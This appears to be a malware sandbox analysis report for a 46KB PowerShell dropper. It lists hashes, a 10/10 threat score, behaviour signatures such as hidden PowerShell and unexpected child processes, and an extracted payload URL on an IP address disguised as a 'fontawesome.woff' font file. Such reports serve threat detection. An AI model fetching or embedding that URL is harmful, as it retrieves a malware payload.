General

  • Target

    3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

  • Size

    46KB

  • Sample

    241113-11jjratmbp

  • MD5

    5ea2abeab52fd2731bfcba44e976931a

  • SHA1

    f5487abbc8837c5a130946158fe72bcbfd0eab10

  • SHA256

    3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

  • SHA512

    2f56c5b5a3a794e8f19624f0a6545750fcc9844883a51f95dffdc49ce5d4b345f0f02f34e7b6307ae3c87a9f60f8b0f449b27c95e33afa972e7cc5c48a881d5e

  • SSDEEP

    768:R4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:OSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Targets

    • Target

      3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

    • Size

      46KB

    • MD5

      5ea2abeab52fd2731bfcba44e976931a

    • SHA1

      f5487abbc8837c5a130946158fe72bcbfd0eab10

    • SHA256

      3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

    • SHA512

      2f56c5b5a3a794e8f19624f0a6545750fcc9844883a51f95dffdc49ce5d4b345f0f02f34e7b6307ae3c87a9f60f8b0f449b27c95e33afa972e7cc5c48a881d5e

    • SSDEEP

      768:R4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:OSFsv66g3KnF439NKC54kkGfn+cL2Xd+

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

MITRE ATT&CK Enterprise v15

Tasks